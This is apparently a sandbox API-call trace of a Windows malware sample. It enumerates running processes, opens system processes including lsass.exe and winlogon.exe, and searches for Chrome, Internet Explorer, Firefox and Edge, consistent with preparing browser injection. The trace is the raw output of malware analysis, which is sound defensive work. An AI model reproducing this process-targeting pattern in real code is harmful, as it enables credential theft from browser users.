	[0250.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.552] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0250.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.552] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.553] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0250.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.553] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.553] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0250.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9f80
	[0250.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.554] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0250.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.554] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.555] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0250.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.555] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.555] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0250.556] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9f84
	[0250.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.556] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0250.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.556] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.557] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0250.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.557] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0250.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9f88
	[0250.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.558] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0250.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.559] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.559] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0250.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.560] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0250.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9f8c
	[0250.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.561] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0250.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.561] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.562] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0250.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.562] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0250.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9f90
	[0250.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.563] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0250.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.563] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.563] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0250.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.564] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.564] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.565] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9f94
	[0250.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.565] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.565] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.565] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.565] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.566] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.566] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9f98
	[0250.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.567] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.567] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.569] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.569] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.570] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9f9c
	[0250.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.571] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.571] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9fa0
	[0250.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.572] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.573] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.573] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9fa4
	[0250.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.575] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.575] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.576] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9fa8
	[0250.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.577] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.577] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.606] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.606] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.607] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9fac
	[0250.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.608] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.608] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.608] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.609] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.609] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0250.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9fb0
	[0250.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.610] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0250.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.610] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.610] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0250.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.611] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.611] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9fb4
	[0250.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.612] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.612] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.612] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.613] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.613] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0250.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9fb8
	[0250.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.614] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.614] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.615] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.615] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0250.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9fbc
	[0250.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.616] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0250.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.617] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.617] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0250.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.617] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.618] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9fc0
	[0250.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.619] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.620] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.620] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0250.621] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9fc4
	[0250.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.621] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0250.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.622] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.622] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0250.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.622] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.623] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0250.623] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9fc8
	[0250.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.623] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0250.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.624] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.624] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0250.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.624] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.625] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0250.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9fcc
	[0250.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.626] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0250.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.626] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.626] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0250.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.626] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0250.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9fd0
	[0250.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.628] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0250.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.628] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.628] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0250.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.629] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.629] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0250.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0250.630] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0250.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9fd4
	[0250.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.631] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0250.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.632] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.632] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0250.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.633] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0250.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9fd8
	[0250.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.634] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0250.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.634] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.635] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0250.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.635] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0250.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9fdc
	[0250.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.636] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0250.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.636] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.637] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
